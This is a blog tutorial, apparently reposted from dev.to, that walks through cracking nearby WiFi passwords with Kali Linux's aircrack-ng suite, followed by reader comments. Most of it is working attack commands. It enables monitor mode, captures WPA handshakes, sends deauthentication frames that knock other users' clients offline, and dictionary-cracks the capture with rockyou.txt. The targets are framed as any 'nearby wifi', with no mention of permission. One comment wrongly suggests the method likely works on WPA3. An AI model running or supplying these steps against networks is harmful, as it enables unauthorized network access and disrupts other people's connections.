Hack WiFi using Kali Linux

posted Originally published at dev.to 2 min read

Today, we will understand how to hack nearby wifi passwords.

Prerequisites:

  • WiFi should be in range (Of course)
  • Kali Linux OS (preferred)
  • Wifi interface(Already present if using laptop)

The tool of kali linux which we'll be using are:

  • airmon-ng
  • airodump-ng
  • aireplay-ng
  • aircrack-ng

. Let's check out the full steps how to get the password of reachable wifi.

Steps to reproduce:

  1. Go to console & type the following command:
ifconfig
  1. Kill all the current processed & network managers related to wifi interface.
airmon-ng check kill
  1. Start the interface using airmon
airmon-ng start start YOUR_WIFI_INTERFACE_NAME

airmon-ng start start wlan0

  1. To view all the wifi networks around you.
airodump-ng YOUR_INTERFACE_NAME

airodump-ng wlan0mon

airodump-ng is for capturing the packets

  1. After sometime, click on CTRL+C to stop scanning so that we've some wifi networks.

  2. Now, we need to view the clients connected to that network

airodump-ng -c 1 --bssid BSSID_NUMBER/MAC_ADDRESS -w /root YOUR_WIFI_INTERFACE_NAME

airodump-ng -c 1 --bssid 80:35:C1:13:C1:2C -w /root wlan0mon

; -c is for channel number, -w is for the directory you want to save the report file

Now, our approach will be disconnecting all the connected clients from the network and sniff the packets received while connecting back to the same network. When it does so, you'll get something we call WPA handshake in current window.

  1. Open new terminal and disconnect the clients from that network using below code:
aireplay-ng -0 10 -a BSSID_NUMBER/MAC_ADDRESS YOUR_WIFI_INTERFACE_NAME

aireplay-ng -0 10 -a 80:35:C1:13:C1:2C wlan0mon

; aireplay-ng is for injecting the required frames to disconnect clients,
-0 for deauthentication(so that clients will retry to connect),
10 for the deauthentication packets to be send, you can increase or decrease depending upon the time you want to spend on this.

  1. You can now close this window. Capturing the password is now completed from our end. Now, we only need to decrypt the password. To open the passwords file, navigate to the directory you've provided in Step 6 above. You'll get a .cap file. That's our file.

  2. For decrypting the .cap file, we've different techniques. We'll use simple technique using aircrack-ng only. It'll help us crack the password using a wordlist. You can use rockyou.txt wordlist which is most commonly used & is updated on regular basis.

Following is the code to run:

aircrack-ng -a2 -b BSSID_NUMBER/MAC_ADDRESS -w WORDLIST_FILE_LOCATION CAP_FILE_LOCATION

aircrack-ng -a2 -b 80:35:C1:13:C1:2C -w /root/passwords.txt /root/hacking-01.cap

; aircrack-ng is WEP/WPA-PSK key cracking program,
-a2 for WPA2 & -a for WPA network,
-w is the wordlist file location,

If password is successfully cracked, you'll get the confirmation message as "KEY FOUND!"


I've tried to teach how to crack wifi password of your nearby wifi network for free in the simplest manner possible. However, if you're facing any difficulty, do mention it in the comment. Will try to help.

You can follow me on LinkedIn, Instagram or check my latest projects on my GitHub. Also, you can check my portfolio too.

[Keep Hacking] [Thanks]

If you read this far, tweet to the author to show them you care. Tweet a Thanks

Nice effort putting this together—it's clear you've simplified a pretty technical process! Quick question though: have you tried this with WPA3 networks yet, or does this method only work reliably with WPA2? Would love to hear more on how it holds up with newer security protocols.

Is this like bruteforcing the encrypted password, taken from captured packets? If so, I'm sure the success rate isn't that high with a long Wi-Fi password. But still, this is good for simple penetration testing.

Not really tried with WPA3 but I guess it's a simple bruteforce, so must be working. You can try & discuss your findings here. Would love to discuss your findings.

Yes Manoedinata, it's a bruteforce if you'll read more about all the mentioned tools:

airmon-ng
airodump-ng
aireplay-ng
aircrack-ng

Success rate is slow for longer & complex passwords. Moreover, you might not end up getting password too. It depends on how strong, long & definite your wordlist is. Thanks for the feedback.

More Posts

Turning Mobile Phones into Linux System with postmarketOS

manoedinata - May 7

Linux vs Windows Which Operating System is Best?

Dewan Codes - Jan 15

Unlocking the Power of Linux Device Drivers

ByteHackr - Nov 3, 2024

A Shell script that sends a file using magic-wormhole cli

Vaishnav-sabari-girish - Sep 30

Using Bash to Monitor Server Health (CPU, RAM, Disk) – A Beginner-Friendly Guide

Gift Balogun - May 25
chevron_left